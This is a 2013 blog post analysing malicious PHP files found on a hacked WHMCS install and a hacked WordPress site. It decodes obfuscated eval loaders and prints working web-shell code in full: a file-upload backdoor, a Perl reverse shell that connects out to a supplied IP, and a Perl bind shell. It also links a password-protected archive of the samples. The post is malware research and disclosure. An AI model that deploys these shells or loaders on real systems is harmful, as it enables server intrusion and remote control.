Home » Miscellaneous

Some interesting malicious PHP files

16 September 2013 No Comment

Hello fellow internet citizens (and bots)

Here is some cool PHP malicious files i found in one hacked installation of WHMCS and one hacked wordpress site.

Note #1 they are mostly not a result of one hack/hacker but several.
Note #2 those are harmful files running them on your computer is not advised, and those are supplied for research purposes only.

Here are the files: click here password is: infected

This is the most interesting file which is r.php (VirusTotal scan: 3/48) it is “WHMCS Killer” by rab3oun

$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=18932;
eval(gzuncompress(base64_decode(‘eNplj8[REDACTED]gT47xDRfgD5Al8g’)));
return;

The decoding line is decoded to:

$O000O0O00=fopen($OOO0O0O00,’rb’);while(–$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);
$OO00O00O0=gzuncompress(base64_decode(strtr(fread($O000O0O00,480),
‘EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=’,
‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/’)));
eval($OO00O00O0);

It keeps reading the encoded junk which is after the closure of the PHP tag, it decodes it 4 times.
The decoded version (which is still hard to read :/) is included as r_DECODED.php, and surprising that the encoded version is detected by 3 anti-virus’es and the original is not (0/46)

Next file is 825451_n2n.jpg (VirusTotal scan: 5/46) which is a nice shell that’s obfuscated twice.
It originally goes as.

<?php $_F=__FILE__;$_X=’Pz48P3BocA0KNX1IDR[TOO_LONG]4NCg==’;
$_X=base64_decode($_X);$_X=strtr($_X,’123456aouie’,’aouie123456′);$_R=ereg_replace(‘__FILE__’,"’".$_F."’",$_X);print($_R);$_R=0;$_X=0;;?>

The second line decodes to:

$_X=base64_decode($_X);$_X=strtr($_X,’123456aouie’,’aouie123456′);$_R=ereg_replace(‘__FILE__’,"’".$_F."’",$_X);eval($_R);$_R=0;$_X=0;

Decoding it again (Decoding $_X) results in a full featured shell , included as 825451_n2n_DECODED.php (VirusTotal scan: 7/44)

Next file is b0x.php (VirusTotal scan 0/47) which is a simple upload script, which wasn’t obfuscated.

<?php
echo ‘<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">’;
echo ‘<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>’;
if( $_POST[‘_upl’] == "Upload" ) {
if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’])) { echo ‘<b>Upload SUKSES !!!</b><br><br>’; }
else { echo ‘<b>Upload GAGAL !!!</b><br><br>’; }
}
?>

Next file is index.php (VirusTotal scan: 16/48) WSO Shell v2.3 Web Shell by oRb, and all custom function names start with WSO
It’s not entirely obfuscated except two chunks which are saved into a perl script and executed.
#1 Back connect code $back_connect_p (decoded included as bc.pl):

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname(‘tcp’);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system(‘/bin/sh -i’);
close(STDIN);
close(STDOUT);
close(STDERR);

#2 Port binding script $bind_port_p (decoded included as bp.pl):

#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname(‘tcp’)) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
accept(CONN,S);
if(!($pid=fork)) {
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

Next file is index (2).php (VirusTotal scan: 26/47) Which is a variant of the famous R57 shell (Variant by SnIpEr_SA) – also not obfuscated.

Next file is install.php (VirusTotal scan: 1/46) it’s an obfuscated version of webadmin.php which is a legit web admin/managing script but of course hackers abused it.
And i am not sure why did he even obfuscated it, the clean version also is detected by one antivirus engine

Next file is New.php (VirusTotal scan: 1/48) which is obfuscated.
It’s decoded to New_DECODED.php (VirusTotal scan: 28/45) and it turns out to be another r57 shell variant (by tryag).

Next file is SaD.php (VirusTotal scan: 8/45) which is a normal PHP shell with nothing significant but it’s the first time i see it.

Next file is xx.php (VirusTotal scan: 6/46) is a cpanel/ftp brute forcing tool.

That’s it, enjoy!

Your opinion matters!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.